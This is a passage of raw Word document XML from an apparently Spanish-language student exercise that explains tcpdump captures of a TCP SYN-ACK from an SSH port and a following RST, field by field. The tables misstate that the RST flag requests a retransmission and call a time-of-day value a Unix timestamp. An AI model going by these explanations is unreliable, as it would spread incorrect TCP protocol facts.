      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PAQUETE 2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="ff00ff"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">20:12:45.833677</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP</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ff0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.250.ssh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="ff00ff"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.222.50217</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e69138"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flags [S.]</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351c75"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">seq 1957264186</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38761d"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ack 3717510173</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e06c2b"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">win 5840</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8d8dd3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">options [mss 1460]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="ff00ff"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="745556"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">length 0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3"/>
        <w:tblW w:w="9315.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2595"/>
        <w:gridCol w:w="6720"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2595"/>
            <w:gridCol w:w="6720"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="1"/>
          <w:trHeight w:val="402.1644291985223"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86">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="720"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Campo</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87">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="720"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción</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line="240" w:lineRule="auto"/>
              <w:ind w:left="19" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="ff00ff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="ff00ff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Timestamp de Unix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9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="19" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="ff00ff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="ff00ff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">20:12:45.833677 - Indica el momento en que se capturó el paquete</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A">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Protocolo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IP - Indica el protocolo de red utilizado en el paquete</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C">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Dirección IP y puerto origen</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D">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10.10.10.250, puerto ssh - Dirección IP y puerto del host de origen que envió el paquete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="530.6364859588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Dirección IP y puerto destino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10.10.10.222, puerto 50217 - Dirección IP y puerto del host de destino al que se envió el paquete</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0">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Flags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 [S.] Flags SYN y ACK activados</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2">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Número de secuencia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1957264186 - Número de secuencia</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4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="19" w:hanging="19"/>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Número de acuse de recibo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line="240" w:lineRule="auto"/>
              <w:ind w:left="19" w:hanging="19"/>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3717510173 - Número ACK</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6">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Tamaño de la ventana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7">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5840 - Indica el número de bytes que el host de destino está dispuesto a recibir</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8">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="19" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="8d8dd3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="8d8dd3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Opciones del paquete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9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="19" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="8d8dd3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="8d8dd3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[mss 1460] - Especifica el tamaño máximo de segmento de la conexión</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="361.71935640586753"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A">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Tamaño del paquete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0 - Indica el tamaño del paquete en bytes, en este caso no contiene datos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PAQUETE 3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="ff00ff"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">20:12:45.833725</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38761d"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IP</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ff0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.222.50217</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.250.ssh</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e69138"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flags [R]</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351c75"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">seq 3717510173</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e06c2b"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">win 0</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color w:val="745556"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">length 0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4"/>
        <w:tblW w:w="9360.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2565"/>
        <w:gridCol w:w="6795"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2565"/>
            <w:gridCol w:w="6795"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="382.757411256477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9E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:shd w:fill="ffffff" w:val="clear"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="720"/>
              <w:jc w:val="center"/>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Campo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F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:shd w:fill="ffffff" w:val="clear"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="720"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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240" w:lineRule="auto"/>
              <w:ind w:left="19" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="ff00ff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="ff00ff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Timestamp de Unix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240" w:lineRule="auto"/>
              <w:ind w:left="19" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="ff00ff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="ff00ff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">20:12:45.833725 - Indica el momento en que se capturó el paquete</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Protocolo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240" w:lineRule="auto"/>
              <w:ind w:left="19" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IP - Indica el protocolo de red utilizado en el paquete</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Dirección IP y puerto origen</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ind w:left="19" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">10.10.10.222, puerto 50217 - Dirección IP y puerto del host de origen que envió el paquete</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Dirección IP y puerto destino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ind w:left="19" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">10.10.10.250, puerto ssh - Dirección IP y puerto del host de destino al que se envió el paquete</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Flags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240" w:lineRule="auto"/>
              <w:ind w:left="19" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="e69138"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="e69138"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">R - Indica que el host de origen está solicitando una re-transmisión (retransmit) del paquete</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Número de secuencia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40" w:lineRule="auto"/>
              <w:ind w:left="19" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="351c75"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="351c75"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">3717510173 - Número utilizado para sincronizar la secuencia de bytes enviados en la conexión</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="400.1737054572237" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="000000" w:space="0" w:sz="0" w:val="nil"/>
              <w:left w:color="000000" w:space="0" w:sz="5" w:val="single"/>
              <w:bottom w:color="000000" w:space="0" w:sz="5"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C">
            <w:pPr>
              <w:widowControl w:val="0"/>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 Número ACK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="000000" w:space="0" w:sz="0" w:val="nil"/>
              <w:left w:color="000000" w:space="0" w:sz="5" w:val="single"/>
              <w:bottom w:color="000000" w:space="0" w:sz="5" w:val="single"/>
              <w:right w:color="000000" w:space="0" w:sz="5"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D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:shd w:fill="ffffff" w:val="clear"/>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No presente - Este paquete es un paquete RST y no incluye información de acuse de recibo</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Tamaño de la ventana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line="240" w:lineRule="auto"/>
              <w:ind w:left="19" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="e06c2b"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="e06c2b"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">0 - Indica el tamaño de la ventana de bytes que el host de origen está dispuesto a recibir</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Opciones del paquete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ind w:left="19" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
